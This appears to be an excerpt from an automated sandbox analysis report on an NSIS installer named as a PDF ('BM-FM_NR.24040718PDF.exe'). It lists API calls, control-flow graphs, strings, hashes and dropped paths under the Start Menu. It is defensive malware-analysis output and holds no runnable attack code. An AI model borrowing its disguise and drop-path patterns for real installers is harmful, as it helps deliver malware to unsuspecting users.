                                                                        • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                        • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                      • lstrcatA.KERNEL32(1033,Dominique Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Dominique Setup: Installing,00000000,00000002,76293410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",00000000), ref: 0040372A
                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes,1033,Dominique Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Dominique Setup: Installing,00000000,00000002,76293410), ref: 0040379F
                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 004037BD
                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes), ref: 00403806
                                                                        • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                      • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                      • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                      • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                      • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes$Call$Control Panel\Desktop\ResourceLocale$Dominique Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                      • API String ID: 1975747703-1954050568
                                                                      • Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                      • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                      • Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                      • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 356 402c66-402cb4 GetTickCount GetModuleFileNameA call 4059a2 359 402cc0-402cee call 405d2f call 4057e8 call 405d2f GetFileSize 356->359 360 402cb6-402cbb 356->360 368 402cf4 359->368 369 402ddb-402de9 call 402c02 359->369 361 402e98-402e9c 360->361 371 402cf9-402d10 368->371 376 402deb-402dee 369->376 377 402e3e-402e43 369->377 373 402d12 371->373 374 402d14-402d1d call 4030b1 371->374 373->374 381 402d23-402d2a 374->381 382 402e45-402e4d call 402c02 374->382 379 402df0-402e08 call 4030c7 call 4030b1 376->379 380 402e12-402e3c GlobalAlloc call 4030c7 call 402e9f 376->380 377->361 379->377 403 402e0a-402e10 379->403 380->377 407 402e4f-402e60 380->407 385 402da6-402daa 381->385 386 402d2c-402d40 call 40595d 381->386 382->377 390 402db4-402dba 385->390 391 402dac-402db3 call 402c02 385->391 386->390 405 402d42-402d49 386->405 398 402dc9-402dd3 390->398 399 402dbc-402dc6 call 40613d 390->399 391->390 398->371 406 402dd9 398->406 399->398 403->377 403->380 405->390 409 402d4b-402d52 405->409 406->369 410 402e62 407->410 411 402e68-402e6d 407->411 409->390 412 402d54-402d5b 409->412 410->411 413 402e6e-402e74 411->413 412->390 415 402d5d-402d64 412->415 413->413 414 402e76-402e91 SetFilePointer call 40595d 413->414 418 402e96 414->418 415->390 417 402d66-402d86 415->417 417->377 419 402d8c-402d90 417->419 418->361 420 402d92-402d96 419->420 421 402d98-402da0 419->421 420->406 420->421 421->390 422 402da2-402da4 421->422 422->390
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402C77
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,00000400), ref: 00402C93
                                                                        • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004059A6
                                                                        • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 00402CDF
                                                                      Strings
                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                      • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                      • Inst, xrefs: 00402D4B
                                                                      • "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe", xrefs: 00402C66
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                      • Null, xrefs: 00402D5D
                                                                      • Error launching installer, xrefs: 00402CB6
                                                                      • soft, xrefs: 00402D54
                                                                      • C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                      • API String ID: 4283519449-2465792201
                                                                      • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                      • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                      • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                      • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 754 401751-401774 call 402a3a call 40580e 759 401776-40177c call 405d2f 754->759 760 40177e-401790 call 405d2f call 4057a1 lstrcatA 754->760 766 401795-40179b call 405f9a 759->766 760->766 770 4017a0-4017a4 766->770 771 4017a6-4017b0 call 406033 770->771 772 4017d7-4017da 770->772 780 4017c2-4017d4 771->780 781 4017b2-4017c0 CompareFileTime 771->781 774 4017e2-4017fe call 4059a2 772->774 775 4017dc-4017dd call 40597d 772->775 782 401800-401803 774->782 783 401876-40189f call 404f48 call 402e9f 774->783 775->774 780->772 781->780 784 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 782->784 785 401858-401862 call 404f48 782->785 797 4018a1-4018a5 783->797 798 4018a7-4018b3 SetFileTime 783->798 784->770 819 40184d-40184e 784->819 795 40186b-401871 785->795 799 4028d8 795->799 797->798 801 4018b9-4018c4 CloseHandle 797->801 798->801 803 4028da-4028de 799->803 804 4018ca-4018cd 801->804 805 4028cf-4028d2 801->805 807 4018e2-4018e5 call 405d51 804->807 808 4018cf-4018e0 call 405d51 lstrcatA 804->808 805->799 813 4018ea-402269 807->813 808->813 817 40226e-402273 813->817 818 402269 call 405525 813->818 817->803 818->817 819->795 820 401850-401851 819->820 820->785
                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold,00000000,00000000,00000031), ref: 00401790
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold,00000000,00000000,00000031), ref: 004017BA
                                                                        • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Dominique Setup,NSIS Error), ref: 00405D3C
                                                                        • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                        • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                        • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0), ref: 00404FA4
                                                                        • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll), ref: 00404FB6
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp$C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold$Call
                                                                      • API String ID: 1941528284-3867132883
                                                                      • Opcode ID: 07cf415a6a98710ef5701abfd9ff3185977c001fd6a6371361f328a65f50246f
                                                                      • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                      • Opcode Fuzzy Hash: 07cf415a6a98710ef5701abfd9ff3185977c001fd6a6371361f328a65f50246f
                                                                      • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 821 402e9f-402eb3 822 402eb5 821->822 823 402ebc-402ec5 821->823 822->823 824 402ec7 823->824 825 402ece-402ed3 823->825 824->825 826 402ee3-402ef0 call 4030b1 825->826 827 402ed5-402ede call 4030c7 825->827 831 402ef6-402efa 826->831 832 40309f 826->832 827->826 833 402f00-402f49 GetTickCount 831->833 834 40304a-40304c 831->834 835 4030a1-4030a2 832->835 838 4030a7 833->838 839 402f4f-402f57 833->839 836 40308c-40308f 834->836 837 40304e-403051 834->837 840 4030aa-4030ae 835->840 841 403091 836->841 842 403094-40309d call 4030b1 836->842 837->838 843 403053 837->843 838->840 844 402f59 839->844 845 402f5c-402f6a call 4030b1 839->845 841->842 842->832 854 4030a4 842->854 847 403056-40305c 843->847 844->845 845->832 853 402f70-402f79 845->853 850 403060-40306e call 4030b1 847->850 851 40305e 847->851 850->832 859 403070-40307c call 405a49 850->859 851->850 856 402f7f-402f9f call 4061ab 853->856 854->838 863 403042-403044 856->863 864 402fa5-402fb8 GetTickCount 856->864 865 403046-403048 859->865 866 40307e-403088 859->866 863->835 867 402fba-402fc2 864->867 868 402ffd-402fff 864->868 865->835 866->847 869 40308a 866->869 870 402fc4-402fc8 867->870 871 402fca-402ff5 MulDiv wsprintfA call 404f48 867->871 872 403001-403005 868->872 873 403036-40303a 868->873 869->838 870->868 870->871 879 402ffa 871->879 876 403007-40300e call 405a49 872->876 877 40301c-403027 872->877 873->839 874 403040 873->874 874->838 882 403013-403015 876->882 878 40302a-40302e 877->878 878->856 881 403034 878->881 879->868 881->838 882->865 883 403017-40301a 882->883 883->878
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: DA$ DA$... %d%%$;]A
                                                                      • API String ID: 551687249-787801786
                                                                      • Opcode ID: 2b72737498d8f4829c31d655f0fb16f39a0d94af35b4a6af303c262a191fd477
                                                                      • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                      • Opcode Fuzzy Hash: 2b72737498d8f4829c31d655f0fb16f39a0d94af35b4a6af303c262a191fd477
                                                                      • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 884 404f48-404f5d 885 405013-405017 884->885 886 404f63-404f75 884->886 887 404f80-404f8c lstrlenA 886->887 888 404f77-404f7b call 405d51 886->888 890 404fa9-404fad 887->890 891 404f8e-404f9e lstrlenA 887->891 888->887 893 404fbc-404fc0 890->893 894 404faf-404fb6 SetWindowTextA 890->894 891->885 892 404fa0-404fa4 lstrcatA 891->892 892->890 895 404fc2-405004 SendMessageA * 3 893->895 896 405006-405008 893->896 894->893 895->896 896->885 897 40500a-40500d 896->897 897->885
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                      • lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0), ref: 00404FA4
                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll), ref: 00404FB6
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll
                                                                      • API String ID: 2531174081-827006035
                                                                      • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                      • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                      • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                      • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 898 40540e-405459 CreateDirectoryA 899 40545b-40545d 898->899 900 40545f-40546c GetLastError 898->900 901 405486-405488 899->901 900->901 902 40546e-405482 SetFileSecurityA 900->902 902->899 903 405484 GetLastError 902->903 903->901
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                      • GetLastError.KERNEL32 ref: 00405465
                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                      • GetLastError.KERNEL32 ref: 00405484
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                      • API String ID: 3449924974-2230009264
                                                                      • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                      • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                      • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                      • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 904 40605a-40607a GetSystemDirectoryA 905 40607c 904->905 906 40607e-406080 904->906 905->906 907 406090-406092 906->907 908 406082-40608a 906->908 910 406093-4060c5 wsprintfA LoadLibraryExA 907->910 908->907 909 40608c-40608e 908->909 909->910
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                      • wsprintfA.USER32 ref: 004060AA
                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-4240819195
                                                                      • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                      • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                      • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                      • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 911 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 918 4023b0-4023b8 911->918 919 4028cf-4028de 911->919 921 4023c8-4023cb 918->921 922 4023ba-4023c7 call 402a3a lstrlenA 918->922 924 4023db-4023de 921->924 925 4023cd-4023da call 402a1d 921->925 922->921 929 4023e0-4023ea call 402e9f 924->929 930 4023ef-402403 RegSetValueExA 924->930 925->924 929->930 933 402405 930->933 934 402408-4024de RegCloseKey 930->934 933->934 934->919 936 4026a6-4026ad 934->936 936->919
                                                                      APIs
                                                                      • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspCEF8.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspCEF8.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspCEF8.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Strings
                                                                      Memory Dump Source
